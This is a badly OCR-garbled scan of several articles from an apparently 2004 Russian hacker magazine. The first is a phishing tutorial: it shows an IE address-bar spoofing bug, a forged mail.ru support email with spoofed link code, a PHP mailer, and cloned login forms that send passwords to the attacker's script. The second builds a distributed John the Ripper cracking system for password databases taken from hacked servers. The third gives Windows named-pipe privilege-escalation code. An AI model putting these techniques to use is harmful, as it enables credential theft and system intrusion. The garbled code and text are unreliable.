чтобы пароль отправлялся его скрипту. 

А ПРЕВРПЩЕНИЕ МПИН1І.№0.П1І 
В мной 

Все это здорово, но в адресной строке по- 
прежнему остается (іНр://шаііги.пз(І.гб. Это труд- 
но не заметить :). Надо что-то делать. Мож- 
но, конечно, вообще убрать строку адреса с 
помощью ЭаѵаЗсгірР'а, но лучше поискать 
более подходящую альтернативу. Посмотрим 
на последние новости Ьид-Егац, связанные с 
Іпіегпеі Ехріогег'ом: 



ШР00И6 



Адрес с описанием ошибки: іш.5ешгіІуІаб.ш/4166ШтІ 



Уязвимосгь обнаружена в Іпіегпеі Ехріогег. Злонамеренный 
пользователь может отобразить поддельный ІЖ в адресной 
строке. А именно включить "%0Г после имени пользователя 
и справа перед символом "Ф" в Ж, чтобы заставить браузер 
отобразить в адресной строке неправильный РОВЦ отличный 
от запрашиваемого домена. 

Решение: способов устранения обнаруженной уязвимости в 
настоящее время не существует. 



Пользуясь этим подарочком от мелкомяг- 
ких, хаксор может заманить жертву на стра- 
ницу с поддельной ссылкой на таіі.гн 
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НТМЬ-файл с поддельной ссылкой 



(собственно говоря, так можно заманить во- 
обще куда угодно - прим. ред.). 

Также сетевой подонок может написать 
жертве письмо в формате іііті от имени 
службы поддержки таіі.ги: 



ЛЕВОЕ ПИСЬМО 



Рогт: Служба поддержки пользователей почтовой системы 
Маіі.Ви <зиррогІ@согр.таіІ.ти> 

То:<ѵазіа_риркіпФпіаіІ.ги> 

Зибр Изменения в работе почтовой службы Маіілі 

<НЖхВ00Ѵ> 

Уважаемый пользователь! 

В программном обеспечении сервера было произведено из- 
менение, в связи с чем Вам необходимо пройти повторную 
веб-авторизацию на почтовом сервере таіі.ги. 

<а бге(="бІІр://таіІги.п$б.ги 1 ' 1агде1="_пе»" 

0пМои$е0ѵег="іііпбоѵѵ.5Іа(и5='б11р://ліаіІ.ги І :ІосаІіоп.бге(=ипе 

$саре( , б11р://таіІ.ги%01ФтаіІги.л5б.ги , ):геІитІгце;" 

опМои5е0иІ= п Іоса1іоп.бте1=ипезсаре( , бИр://піаіІ.ти%01ФліаіІ- 

ти.п5й.тц'):">МІр://піаіІ.ги</а> 

</В(ЮѴ></НТМЕ> 

В итоге, при наведении на ссылку в стро- 
ке статуса отобразится урл М1р://таіі.ги и отк- 
роется окно с левым таіі.ги (в нашем случае 



кок можно поспать ПИСЬМО о формпте тѵ 



Н амылить письмо в виде про- 
извольной НЕтІ-страницы 
не так просто, как кажется на 
первый взгляд. Дело в том, что 
далеко не все почтовые софти- 
ны позволяют это делать. Од- 
нако написать скрипт, позволя- 
ющий отсылать любые НЕтГни- 
ки, гораздо проще. Разница 
между простым текстовым 
письмом и форматированным 
лишь в том, что в заголовке 
письма, а конкретно в поле 
СопЕепЕ-Туре стоит значение 
ЕехЕ/ріаіп вместо ЕехЕ/йЕті. 



Вот РНР-скрипт для 
отправки мыла в хтмл- 
формате: 

<7 

$Ітот = "1Ф2.3": II от кого 
Зетаіі = "ЗФ2.1": II куда отправить 
Зіоріс = "ЗнЬ]": II тема письма 
Зпіеззаде = "<НЖ>...</НЖ>"; II текст письма 
II собираем письмо 

Збеайетз = "Ртот: "$Ггот."\г\пКеріу-То: "$Егот."\г\п' 
Збеабегз .= "МІМЕ-Ѵетзіол: 1.0\г\л": 

Збеайетз .= "Сопіепі-Туре: Іехі/біліі;": 

ЗЬойу .= $те$5аде."\г\п\г\п“; 

таіі (ЗетаіІ, Зіоріс, ЗЬойу. Збеайетз): II отправляем 

7 > 
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- таіі.пзсі.ги), причем в строке адреса опять 
будет написан тот же таіі.ги. 

А СБОР 9Р0ЖПЯ 

После отправки подобного письма хакеру 
остается лишь подождать, когда же лопоухий 
юзверь ''пройдет повторную авторизацию". 

В случае успеха в файле ііЕЕрУ/таііги.пзсІ.ги/Іод.ЕхЕ 
появится новая запись с логином и паролем. 

Как ты, наверное, понимаешь, таким спо- 
собом можно ломать не только почтовые сер- 
висы, но и аккаунты пользователей хостингов. 




Возьмем для примера популярный бесплат- 
ный хостинг пагоіпі. Достаточно скопировать 
страницу с формой ввода пароля и в форме 
ЬодіпРогт вместо асЕіоп=ЬЕ1р://ра$$рогЕ.уап- 
бех.ги/сді- 

Ьіп/Вед.рі?тогіе=аиііі&геЕраііі=ІіЕір://паго(і.уа 
псІех.ги/изегагеа/аЕіег гедізЕег.хЬЕті указать 
адрес левого скрипта (асІіоп=ИЕІр://пзсі.ги/сді- 
Ьіп/пагогі-аиЕЬ.сді). Осталось сделать массо- 
вую рассылку писем с просьбой заново зало- 
гиниться, чтобы получить кучу аккаунтов от 
различных пользователей. 

А кпк от этого защититься? 

Чтобы защититься от такого вида социаль- 
ной инженерии, надо учиться на чужих 
ошибках и всегда задумываться, а не хотят 
ли кинуть тебя. Так что будь начеку. И если 
кто-то вдруг предложит зайти на некий сайт, 
лишний раз подумай, нет ли там какой-ни- 
будь подставы. Также не стоит юзать осла 
(М5ІЕ). Лучше поставь какой-нибудь менее 
распространенный браузер, где хакеры еще 
не отловили много багов. Могу посоветовать 
два браузера: Орега (шмрега.сот) и Могіііа 
(иѵшогіііа.отд). 

А ВЫВОДЫ 

А выводы весьма печальные. Ошибки в ІЕ об- 
наруживаются чуть ли не каждый день. И вряд 
ли их станет меньше. К тому же недавно выло- 
жили часть сорсов ѵѵіп2к. Теперь багокопатели 
заработают еще жестче. А юзеры, по своей ле- 
ни или тупости, будут по-прежнему забывать 
ставить заплатки, что в итоге приведет к появ- 
лению в Сети тысяч потенциальных жертв. И, 
естественно, их кто-нибудь будет ломать. Так 
что мой тебе совет: всегда следи за новыми 
ошибками, патчи себя и будь бдителен! Не 
дай себя обмануть! ЗИ 




а В Іпіегпеі 
Ехріогег’е присут- 
ствует множество 
других ошибок, ко- 
торые могут при- 
вести к угону чужих 
аккаунтов. Напри- 
мер, ошибки в 
С35. Об этой баге 
читай статью в 
этом же номере. 
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/ ХПКЕР/№03(БЗ)/2004 



I Докучаев Дмитрий ака РогЬ (іогЬ@геаІ.хакер.пі) 



ПРЕВРОТИ ПОКОВКУ 







последнее вреия вошли в иоду системы распределенных вычислений, предназначенные дня поиска таких удивительных вещей, как, 
наприиер, лекарство от рака, зеленые человечки или аномальные явления. Этим занимаются ученые и исследователи. О ты чем 
хуже? Правильно, ничем! Именно поэтому сейчас мы займемся написанием своей распределенной системы вычислений. 




ОБЪЕДИНЯЕМ МОЗГИ ДОЯ РЕШЕНИЯ ОБЩЕЙ ЗПДОНИ 



к. 



А 
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л На нашем ком- 
пакте ты найдешь 
архив со скрипта- 
ми, а также модуль 
РегІ-ССІ. В качест- 
ве бонуса на диске 
будет выложен пе- 
реборщик .Іоііп ТНе 
Віррег. 



А ПОВЕРЬ МНЕ, ЭТО НЕСЛОЖНО 

Н ет, я не собираюсь кодить 
ужасный скрипт, который 
будет искать воду на Марсе 
или жизнь на Солнце. Идея 
носит чисто хакерский харак- 
тер и, на самом деле, доволь- 
но банальна. Представь себе: 
ты поимел шелл на крутом 
серваке (неважно каком) и случайно наткнул- 
ся на базу паролей. Перебирать их на твоем 
слабеньком компьютере невозможно, либо 
просто нет желания этим заниматься. Ты 
спросишь, причем же здесь система, и полу- 
чишь достойный ответ ;). Алгоритм довольно 
простой: на ѵѵеЬ-сервер помещается нес- 
колько скриптов, выполняющих всего две 
функции. Это прием зашифрованного пароля 
и выдача его клиенту. Если ты думаешь, что 
клиент - это пользователь, принявший учас- 
тие в вычислениях, то ты немного ошиба- 
ешься. На самом деле, клиент - это тоже 
скрипт, являющийся частью системы. Имен- 
но он выполняет запросы к серверу. Понача- 
лу алгоритм выглядит сложно и интригующе, 
но в дальнейшем все станет ясно. 



А ВСЕ НПЧППОСЬ... С КОНФИГОВ 

Когда я берусь за какой-либо проект, то на- 
чинаю с процесса составления конфигов. 
Если конфигурационный файл придуман, 
то сам код пишется очень просто. В моем 
случае серверный конфиг называется 
таіп.іпс. Его предназначение - определить 
главные пути системы и установить значения 
некоторых переменных. Рассмотрим этот 
файл подробнее. 




Зеісбіг- еіс'; ## Путь к базе паролей 
$Іодбіг- Іод'; ## Путь к журналу системы 
$заІКІІебез="$е(сбіг/без.($": 

НА Пути к зашифрованным паролям № и ОрепЕМ 
ВіоиРіііт) 

$5аМеоб="$еісбіг/оУ$"; 

$таіпІод="$Іодбіг/ліаіпІод.(5"; НН Пог общи* запросов 
НН Каталог для идентификаторов пользователей 
$и$егбіг='оіегз': 

В Кузіет ѵагіабіез 

$соипІсгаск=3; НВ Максимальное число отправки пароля 



Если в случае с путями вопросов не воз- 
никает, то назначение последней перемен- 
ной вызывает интерес. Пользователям раз- 
решается запросить определенный пароль 
только $соипісгаск раз, поскольку код может 
быть очень сложным, а загружать им систе- 
му нерационально. Дефолтовое число попы- 
ток очень мало, его рекомендуется инкрими- 
нировать с ростом популярности системы. 

А ТПКИЕ РОЗНЫЕ ППРОПИ 

В пингвине пароли шифруются не един- 
ственным методом. Общеизвестных спосо- 
бов как минимум два: РЕ5 и ОрепВЗР 
ВІотл/Різб. Именно их расшифровку я реали- 
зовал в своей системе. Каждый шифр нахо- 
дится в определенном файле (сІез.Ез и оЬ.Ез) 
и посылается клиенту в зависимости от вы- 
бора пользователя. После того как іобп рас- 
шифрует пароль, сценарий обращается к 
серверу и отправляет расшифрованный пас- 
сворд. В скрипте реализована проверка на 
вшивость ;) - запись в лог производится 
после выполнения небольшой процедуры. 
Она проводит сравнение кода, составленно- 
го по присланному паролю, с тем, который 
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ПРЕВРПТИ ЛОКППКУ В И0ШИН9 УБИЙСТВО 



НЕСОВЕРШЕНСТВО СИСТЕМЫ 



К ак и в любом первом релизе, не были учтены все возможнос- 
ти. К примеру, моя система - это лишь скелет, требующий 
наличия ѵѵеЬ-оболочки и администрирования. При желании 
можно подружить систему с туЗСН. и добавить множество 
разных вкусностей. В скриптах ты можешь включить подде- 
ржку «очков» или «баллов», которые будут эквивалентны неко- 
торому числу ѴѴМ2 ;). В общем, фантазируй и модернизируй 
мои скрипты. Свои творения высылай мне на е-таіі. Я обяза- 
тельно их рассмотрю и, возможно, они будут описаны в новых 
выпусках Хакера. 



ЯІЛШй ,»и1 КО* *■■■ ТЯЖЩЯОВіѴиЦчЯЧ, Л»: 

|огЬ:і2»4Н*фІгре ЛБЬ'ЬЛГ№ѵЬ02 . .исиТгвкЛѴЦ*» 5 Ц»*УЕІіі*йС: 



Формат файла с паролями 



высылался клиенту. Во всех случаях проис- 
ходит возврат результата, в зависимости от 
которого клиент делает выводы об исходе 
операции. Короче говоря, прием против чи- 
теров имеется, и работает как надо. 

А ОБЗОР СЕРВЕРНОЙ ЧПСТИ 

Как я уже сказал, система состоит из двух 
частей - серверной и клиентской. Причем од- 
на никоим образом не зависит от другой. Они 
лишь взаимодействуют между собой. Таким 
образом, серверная часть включает в себя три 
главных файла: конфиг таіп.іпс и два скрипта 
деіразз.сді и риіразз.сді. Вообще-то их можно 
было объединить в один, но простота реали- 
зации не позволила мне этого сделать ;). 

Сценарий деіразз.сді выдает пароль клиенту. 
Делает он это совершенно рандомно, опираясь 
лишь на тип, предложенный юзером. Единичка 
соответствует РЕВ, двойка - ОрепВЗО 




ВІоѵѵРізб. Этому скрипту также передается ин- 
дивидуальный идентификатор, выданный кли- 
енту. Помимо этого идентификатора, имеется 
также специальная переменная $оИ, равная но- 
меру, закрепленному за владельцем пароля. 
Иными словами, когда человек заслал пароль в 
систему, то его идентификатор также заносится 
в базу. Это удобно, поскольку после удачной 
расшифровки становится известно, чей, 
собственно, пароль был разгадан. 

Помнишь, я говорил про переменную 
$соипІсгаск? Именно в деіразз.сді использу- 
ется этот порог. Чтобы все стало ясно, пос- 
мотрим на кусок кода. 



ПРОЦЕДУРА СНЕСКС01Щ) 



зиЬ сПесксоип! { 

## Шифрованный пароль передается в качестве параметра 
ту $заІі = еШ; 

К# Определяются локальные переменные 
ту (і>$аІІ$, $соипІ, Знает, $рѵѵті. Зоіб); 

## Открываем базу паролей для чтения 
орепдиегуС'"); 



йіІе(<РШ)>){ 

ри5(і(@5аІІ$,$_): ## Заполняем массив йаііз 
} 

сІозе(Ріт); 

орепдиегуСЬ 11 ): ## Открываем ту же базу для записи 
Іогеасіі (і>заІІ5) { 
іі ($_ пе $заІ1) { 

ргілі РІГО ## На лету просматриваем массив 
} еізе { 

(Знает, $р»б, Зоіб, Зсонп()=арІІІ(':',$_): 

ЗсоипІ++: ## Увеличиваем порот 

і( (Зсоипі < Зсоолістаск) { ## Если порог не предельный 

## Записываем в базу строку 

ргілі РІГО "Зиает:$р»б:$оіб:ЗсонпІ\п": 

} еіае { 

#К Иначе комментируем строку 
ргілі РІГО "\#$наег:$рііб:Зоіб:$соипІ\п": 

}}} 

сІозе(РШ); 

К# Не забываем вернуть идентификатор хозяина 
геІнгп(Зоіб): 

} 

Суть процедуры заключается в том, чтобы 
проследить пороговое значение и закоммен- 
тировать салт, если это необходимо. Понят- 
ное дело, что комментированные строки не 
обрабатываются скриптом (то есть просто 
пропускаются). 

Как ты заметил, в процедуре засветилась 
загадочная функция орепдиегу(). Она, как 
видно из комментариев, открывает нужную 
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л Параметр — гиіез 
необходим для бо- 
лее сложного пе- 
ребора по слова- 
рю. Если он ука- 
зан, каждое слово 
в вордлисте будет 
изменяться в реги- 
стре и добавляться 
к случайным циф- 
рам. Иными слова- 
ми, шанс удачного 
перебора при на- 
личии -гиіез резко 
возрастает. 
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ПРЕВРПТИ ПОКРПКУ В МИШИНУ УБИЙСТВО 



ХПКЕР/№03(63)/2004 



взпом 





базу. Выбор зависит от типа, который при- 
сылает клиент, поэтому открытие и вынесе- 
но в отдельную часть скрипта. 




зиБ орепциегу { 
ту($ассе$$)=5Ш; 

Ззіуре == 1 ? ореп("РКШ","$ассе55$$аІ№Іе(Іе5") : 
ореп("Р*В","$ассе55$5аІМІеоЬ"Й 

Как видишь, все оказалось просто и ком- 
пактно. В качестве параметра передается 
доступ к файлу, который тут же подставляет- 
ся в функцию ореп(). 

А ррзгпппп? 
приштяРЕЗУПьш 

Второй скрипт риіразз.сді не представляет 
особого интереса. Единственное, что хоте- 
лось бы показать, это процедуру проверки 
правильности расшифровки с помощью 
функции сгурІ(). 



ПРОВЕРКА НА ВШИВОСТЬ 



зиБ сРіескзаІІ { 

## Выделяем салт из строки 
(цпБеІ, ЗзаИрзрІІК'/ЗзаІІ); 
геіигп О 

і( (сгурКЗрмІ, ЗзаІІ) пе ЗзаІІ); 
геіигп 1} 




Я Сі б # і- 

[ гооівкі б, сііепі] # регі сііепі.рі -§ О 
зепЬ :?іс!=313378,іуре=1 
Ьаіі и» аз сіитресі 

С гооіѲкі і сііепі] # регі сііепі.рі -с 1 
Зіагііпе ргосезз . . . 

N 0 гезиіііз... ЗыіісЬ іо АІ_І_ гл обе. 

N 0 гезиіііз... ЗыіісН іо АІ_І_ глобе. 
[гооі@кіі сііепі]# 1з 
сііепі.рі еіс кз.ітр заіі.заѵе і 
[гооіѲкіі сііепі]# | 

Запрос нового пароля 



X) с; з 



й? 



[гооіѲкіі зузіет]# ссі сііепі/ 
[гооіѲкіі сііепі]# регі сііепі.рі 
зепсі :?ісІ=313378,іуре=1 
5іагііп§ ргосезз . , , 

Вопе. Ѵоиг рысі із 1111 
5а1і ыаз ігапзГеггеЬ іо Гзегѵег, 
[гооіѲкіі сііепі]# саі заіі.заѵе 
Г огЬ : 1 1В2ШЕГ с15і Рос : 33 : ОТ г ооіѲкі і 
[гооіѲкіі сііепі]# 



-8 1 -і 1 



Рез із 1 



сііепі]# 



Пересылка пароля серверу 




ный файл. Именно он переда- 
ется в качестве параметра 
программе ІоІіп Біе Рііррег. 

Процесс перебора пароля 
может быть завершен по 
двум причинам - по желанию 
пользователя или после пол- 
ного перебора. При запуске 
программы происходит пере- 
определение дескриптора вы- 
вода в файл Тз.Ттр. Как толь- 
ко переборщик завершает 
свою работу, этот файл открывается на чте- 
ние. Если там обнаруживается пароль, то он 
сразу же пересылается на удаленный сервер. 

Первоначально расшифровка ведется по 
словарю (при его наличии), затем начинает- 
ся полный перебор. В случае если юзер об- 
рывает процесс, происходит перехват сигна- 
ла и копирование файла гезіоге в папку 
-изег/рНп. Используя этот файл, можно про- 
должить процесс перебора позже. Поэтому 
никто не запрещает запускать рйп, когда ре- 
сурсы машины простаивают ;). 



После того как произошла проверка, сце- 
нарий пишет результат в лог и возвращает 
значение клиенту. Вот и все, что он делает. 

А КЛИЕНТ ПОД МИКРОСКОПОМ 

Настало время разобраться с клиентом. Он 
состоит из двух файлов: конфиг Ісііепі.сопі и 
скрипт сііепі.рі. Конфиг имеет гораздо боль- 
ше переменных, чем в серверной части. Са- 
мые главные из них необходимо описать: 

## Сервер с установленной системой 
ізегѵег-ІзузІеп.БозІлТ; 

$сш=зізз7: 

$ргодпате="/и5г/Ьіп/)оІт": 

ПК Словарь (должен находиться в директории еіс) 
$#огіІІІ5І="еІс/#І.($"; 

## Использование параметра -гиіез 
$епаЫегиІез=1; 

Конфигурационный файл сделан для того, 
чтобы не нагружать пользователя и не переда- 
вать все опции через командную строку. Но 
несмотря на это, некоторые вещи следует 
отправлять в консольном режиме. Например, 
опция «-д» определяет действие скрипта пос- 
ле получения пароля от сервера (1 означает 
немедленную расшифровку, 0 - простая за- 
пись пароля в файл). Параметр «-с» отвечает 
за продолжение прерванной расшифровки, «- 
і» передает идентификатор (имеет больший 
приоритет, чем конфиг) и т.п. Описание оп- 
ций можно найти в сорцах сііепі.рі (ВТР5 тебе 
поможет ;)). В самом коде нет ничего сложно- 
го - создается соединение с сервером, затем 
запрос и обработка результата. После этих 
действий пароль записывается в определен- 



НАЧАЛО ПРОЦЕССА ПЕРЕБОРА 



зиЬ сгаскзаіі ( 

туйгиіез, $рмІ, $ЬіпзІгіпд, @ге$); 

ІІ ($мшІІІ$ІІ { (Я Если существует словарь 
(И Оформляем список параметров 
Зтиіез == 0 ? $тиІез=" : $піІе$ =І -піІе$'; 

ЛК Оформляем строку запуска 

$Ьіп5Ігіпд="$ргодпате -иіипііізі Ігліез $за*е(ІІе Мз.ітр 

2>/(іе»/пиіі": 

ргіпі "Яагііпд ргосезз.Дп"; ЛК Стартуем процесс 
'$ЬІП5Ітіпд': 

$рѵѵс1=сІіескге5(): 

ри1заЛ("$рмГ) 

ІІ (Оеііпеіі $ржІ): 

) 

^ достпвкп, установка 

Вот и весь базовый набор скриптов. На пер- 
вый взгляд, установить их на свой сервер 
очень сложно, но на самом деле это не так. 
Достаточно просто скопировать структуру 
системы в каталог сді-Ып и проставить права 
755 для двух скриптов и 777 для каталогов 
еіс, изегз и Іод. Из соображений безопаснос- 
ти рекомендую изменить название и путь к 
конфу таіп.іпс и не позволять читать назва- 
ния файлов в текущей папке. Чтобы быстро 
удостовериться в работе системы, сходи ос- 
ликом на скрипт деіразз.сді. Если все в по- 
рядке, скрипт вернет один из паролей в базе. 

И напоследок скажу, что скачать систему 
ты можешь с моего сайта: 
ПНрУ/катепзк.пеігиДогЬ/І/хЛзузІетІаг.дг. Там же ты 
найдешь перловый клиент и примитивные 
дефолтные базы. Реализуй систему на своем 
сервере и получай деньги от клиентов. Нача- 
ло уже положено. ЦС 



зависимости 



С истема имеет ряд зависимостей, которые следует удовлет- 
ворить. Во-первых, для работы необходим функционирую- 
щий РегІ-интерпретатор (поставляется по умолчанию в любой 
*піх-Ііке системе). Во-вторых, нужны модули ССІ.рт и 
Зоскеірт (их можно достать на регІ.сот/СРАІМ). И, наконец, 
для нормальной работы клиента установи ДоМп ТІте Віррег. Сли- 
ваем его по ссылке 








Замучался 

с ОіаІ-Ур? 



МЕДЛЕННАЯ СКОРОСТЬ? 
ПОСТОЯННЫЕ ОБРЫВЫ? 
ТРУДНО ДОЗВОНИТЬСЯ 
ДО ПРОВАЙДЕРА? 

ЗАНЯТ ТЕЛЕФОН? 



Ф* 









"'“ѴЬІІчіа С шшщ Ьыйгглі..г<> 



ОчГІШЮОь іцн 

і» ІРіЧИІі I 



1-щ/ ІГФАІІЧ-.Н^., (Г* ад щЬ іміѵ. 

е Гггіііі^иі-.кя гМуви., л4 „ыг гтѵЯ 
В ЬЯ&.'Ю 



■* 3*4" , 



| &!1—нц | 



ключаи 



Домашний 

интернет-канал 



$30 ЗА 1 ГИГАБАЙТ ТРАФИКА 
ВСЕГДА СВОБОДНЫЙ ТЕЛЕФОН 
НАДЕЖНЫЙ ДОСТУП 24 ЧАСА 
В СУТКИ 

УДОБСТВО ОПЛАТЫ 







ШКАЧАЕШЬСЯ/ 




\У 



■У 



6 



•_л 



СиФЭнеише г 

гийіс.ппрЗ і; *ѵлѵ зцраптінИс сот 




СКОРОСТЬ - 1 Мбит/сек! 



Услуги сертифицированы Лицензии Минсвязи РФ: №2^ №12235; №12203. 





тел.: 105-55-45 
штѵ.зігеат.ги 





взпом 



Ш ришпо время поговорить о наиболее интересных атаках. Речь пойдет о поименованных каналах в Шішіошз. Область их применения 
довольно широка и позволяет реализовать как локальные, так и удаленные атаки. Но об этом немного позднее, а пока необходимо 
разобраться, что представляют собой каналы и для чего они созданы. 



МУЧПЕМ ПОИМЕНОВПННЫЕ КПНППЫ В ШВ0Ш8 




л На нашем диске 
лежат все рассмот- 
ренные в статье 
исходные коды. 



А КПНППЫ №N00111(8 

М атей Ріре Рііе Зузіет - фай- 
ловая система поименован- 
ных каналов (в дальнейшем 
просто каналов). Сам канал - 
это однонаправленный или 
дуплексный интерфейс, соз- 
данный для организации пе- 
редачи данных между серве- 
ром и клиентами. Обращение к каналу про- 
изводится по его имени, он, в свою оче- 
редь, имеет свои собственные буфера и 
дескрипторы, что позволяет ему одновре- 
менно обслуживать множество клиентов. 
Следует также знать, что, кроме поимено- 
ванных каналов, существуют также аноним- 
ные, но в данном случае они не представля- 
ют для атакующего ничего интересного. 

Основная причина создания этой техноло- 
гии - предоставление возможности двум 
приложениям безопасно обмениваться дан- 
ными. Реальным примером этого служит си- 
туация, когда приложение, запущенное от 
имени ограниченной учетной записи, нужда- 
ется в получении некоторой информации, ко- 
торая доступна только привилегированному 
процессу. В таком случае в дополнение к 
приложению в системе регистрируется сер- 
вис, имеющий права системы, созданный ка- 



налом. Таким образом, все необходимые 
данные получает сервис, после чего сам сер- 
вис передает их приложению клиента посре- 
дством канала. Преимущества такого подхо- 
да легко определить в контексте организации 
безопасности приложения. Поскольку сервис 
исполняет ограниченные функции, то злоу- 
мышленник практически не имеет шансов 
воспользоваться им для повышения привиле- 
гий. В то же время само приложение не име- 
ет высоких прав в системе и не может слу- 
жить объектом для атаки. Но если бы прило- 
жение имело права системы, то атакующий, 
используя различные атаки, мог бы заставить 
его исполнить свой программный код от 
имени привилегированного процесса. 

В качестве атак могут использоваться пере- 
полнение стека, кучи, а также ЗбаПег-атаки 
(их описание было в Хакере 12.03). 

Для организации работы каналов системой 
используется драйвер прТз.зуз, который предс- 
тавляет интерфейс, сходный с интерфейсом 
драйвера файловой системы. В действитель- 
ности эту технологию нельзя назвать файловой 
системой. Единственное, что указывает на 
сходство каналов и файлов - это способ обра- 
щения к ним. Подключение к каналу произво- 
дится функцией СаІІМатесІРІре: 



ОПИСАНИЕ К САІШМЕВРІРЕ 



ВООб СаІЖатесІРІре( 

II имя канала 
І.РСТ5ТВ Ір№тесІРІре№те, 

II указатель на данные, записываемые в канал 
І.РѴ0Ш ІрІпВнЯег, 

II длина данных, записываемых в канал 
ВИНО пІпВиГГегЗіге, 

II указатель на данные, прочитанные с канала 
ЕРѴОІВ ІрОиІВиІІег, 

II длина данных, прочитанных с канала 
ОМ пОиІВиГГегЗіге, 

II длина данных, которые следует прочитать 
1РРИ0КР ІрВуІезКеаР, 

//задержка при подключении 
РИОКР пТітеОиІ 
); 

Но, как уже говорилось ранее, обращение 
к файлам и каналам идентично. Это 
действительно так, поскольку для подключе- 
ния вместо функции СаІІМатесІРІре можно 
воспользоваться СгеаІеРІІе: 



ФУНКЦИЯ ШТЕРНЕ 



ШШЕ СгеаіеРІІеІ 
ЕРСШВ ІрГІІе№те, 
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ВШОВВ гМе$ігегІАссе$$, 
вШОВ» (1чѵ5(іагеМос1е, 

ІРЗЕСШТУАТТВІВШ ІрЗесигіІуАІІгіЬиН 
ОМО сІѵѵСгеаііопОізрозіііоп, 

ОНОКО сІѵѵРІадгАпсІАІігіЬиІез. 

НАМйІЕ ІіТетрІаІеРИе 
); 

Для тех, кто хорошо знаком с организаци- 
ей работы ѴѴІпбоѵѵз, не секрет, что данная 
функция имеет более широкое применение 
в работе ОС. С ее помощью создаются или 
открываются файлы, директории, физические 
диски, коммуникационные ресурсы, таіізіоі'ы 
и ріре'ы. В данном случае нас интересует 
только последнее, а именно ріре (канал). 

Так или иначе, имя канала должно соотве- 
тствовать стандарту ЕІР1С. Это значит, что 
для подключения к каналу с именем 
“ЫатесІРіре” имя для локального подключе- 
ния должно иметь вид “\\.\ріре\№тебРіре”. 
В случае если необходимо подключиться 
к каналу, созданному на другом компьютере, 
вместо точки нужно указать его имя. 

^СОЗДЯНИЕШППОВ 

Давай изучим технологию создания каналов 
и попробуем подключиться к нему. Пайп 
можно создать с использованием следую- 
щей конструкции: 

СОЗДАНИЕ ПАЙПА 

сйагІрРіре = пеѵѵ сМОхРР]; 
зргіпЩ ІрРіре, "\\\Ѵ\\ріре\\1е$Іріре" ): 

НАШ ІіРіре = 0: 

ДРіре = СгеаМатесІРІреІ ІрРіре, РІРЕ_АССЕ$ШРІД 
РІРЕ_ТУРЕ_МЕ55АСЕ|РІРЕ_1Л/АІТ, 2, 0, 0, 0, Ш ); 
і(( ІІіРіре ) геіигп 1: 

Таким образом, создается канал с именем 
"\Ѵ\ріре\іезІріре". Как видишь, ничего слож- 
ного на этом этапе нет. Только для создания 
действительно рабочего кода необходимо 
организовать процедуру ожидания подклю- 
чения клиента: 




р$В = (Р5ЕС1Ш ВЕЗСВІРТОВ) 
ЕосаІАІІосаРТКДСШТНЕЕСРІРТОК.МІіиЕНбТН); 
ІпіІіаІІ2е$есигііуВе$сгірІог(р5В, 5ЕСиКІТѴ_ВЕ5СКІРТ0К_КЕѴІ- 
5І0Н); 

ЗеІЗешіІуВевсгірІогВасКрЗВ, ТВНЕ, рАСЕ, РАБЗЕ): 
за.пЕепдОі = аіхеоі (ЗЕСІІВІТУАТТВІВШ); 
за.ІрЗесигіІуРезсгірІог = рЗР; 
за.ЫпбегіЕНагкіІе = ЕАБЗЕ; 

СоппесШатегІРІре (ІіРіре, N11(1): 

В этом примере мы сначала инициализи- 
руем некоторые настройки относительно бе- 
зопасности. Сейчас не будем обращать на 
этот код внимания, его логическое продол- 
жение будет немного ниже. Пока мы просто 
ждем подключений со стороны клиента. От- 
компилируем исходник и проверим его на 
работоспособность. Если компиляция прош- 
ла гладко, то программка запустится и будет 
работать. Теперь следует открыть любое 
другое приложение, работающее с произ- 
вольными файлами. Ими могут быть 
КІоІерасІ, тзРаіп! и т.д. Дальше осталось 
только проверить канал, написав его имя в 
диалоговом окне «Файл» -> «Открыть». 




И если ты не вносил изменений в исход- 
ник, то наша программа (создающая канал) 
должна просто завершить работу. Как ви- 
дишь, пайп все-таки создается, и клиент мо- 
жет к нему благополучно подключиться. 
Теперь осталось выяснить одно: как с по- 
мощью этого можно поднять свои права в 
системе. 

^ОПИСОНИЕПТПКИ 

Собственно атака заключается в том, чтобы 
заставить системный процесс обратиться к 
каналу. После чего, используя некоторые 
АРІ-функции, получить его права. Исполнить 
такое условие довольно просто. Для этого 
используется прием (он был описан выше) 
подмены файла на канал. Такое решение ра- 
ботает, поскольку для открытия файла ис- 
пользуется функция СгеаІеРІІе, которая также 
позволяет подключаться к каналам. 

В теории, после того как привилегирован- 
ный процесс подключится к каналу, не долж- 
на возникать возможность для получения 
сервером, создавшим канал, прав клиента, 
который подключается к каналу. Иначе это 
нарушает всю политику безопасности ОС. 

Но, используя функцию 
ІтрегзопаіеМатебРіреСІіепі, сервер может 
изменить поток своего процесса так, чтобы в 
контексте безопасности получить права сис- 
темы. На этом и базируется атака с исполь- 
зованием поименованных каналов. Пом- 
нишь, в листинге был кусок, о котором мы 
хотели поговорить позже? Самое время это 
сделать :). Если приложение атакующего уже 
запущено, оно не может изменять свои при- 
вилегии в процессе работы. Поэтому даже 
после получения привилегий системы основ- 
ной процесс все равно имеет ограниченные 
права, с одной лишь разницей: он имеет 
право на создание привилегированных пото- 
ков. А это уже неплохо... 




Ітрегзола(еМатесІРіреСІіепІ (ІіРіре): 
ОрепТИгеаііТокепІбеІСиггепІТІігеаОО, ТОИДЕАССЕЗЗ, ТВІІЕ, 
Шокеп )) { 

йирІісаІеТокепЕхІІіТокеп, МАХІШШ.АШМЕВ, 5аа, 
Зесигііуітрегзопаііоп, 

ТокепРгітагу, Шокеп2); 

рбепегіс = пеѵѵ бЕИЕИМАРРМ: 

р6епегіс->СепегісКеа(І=ЕІЕЕ_6ЕНЕРІС_КЕА0: 

р6епегіс->6епегісИгіЕе=ЕІЕЕ_6ЕНЕКІС_ИКІТЕ: 

р6епегіс->ЕепегісЕхесиЕе=ЕІЕЕ_6ЕНЕРІС_ЕХЕСІЛЕ: 

р6епегіс->ЕепегісАІІ=ЕІЕЕ_АЕЕ_АССЕ35: 

МарБепегісМа$к( КДѵѵАссеззОезігесІ, рБепегіс ); 



Такие нехитрые манипуля- 
ции на этот раз дают нашему 
процессу права системы, но 
в идеале эксплойт должен за- 
пустить консоль с правами 
системы. А согласно МЭРИ, 
чтобы исполнить приложение 
от имени чужой учетной запи- 
си, следует использовать 
функции ЕодопЕІзегО и 
СгеаіеРгосеззАзІІзегО. 

ЕодопЕІ$ег() требует в качестве 
параметров логин и пароль 
учетной записи, в правах кото- 
рой нуждается атакующий. 

Задачей ЕодопЕІзегО является 
